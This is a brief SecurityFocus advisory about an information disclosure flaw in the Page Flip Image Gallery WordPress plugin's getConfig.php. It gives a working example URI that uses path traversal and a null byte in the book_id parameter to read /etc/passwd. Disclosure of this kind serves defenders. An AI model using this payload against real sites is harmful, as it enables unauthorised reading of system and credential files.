Page Flip Image Gallery 'getConfig.php' Information Disclosure Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123


 

Privacy Statement
Copyright 2010, SecurityFocus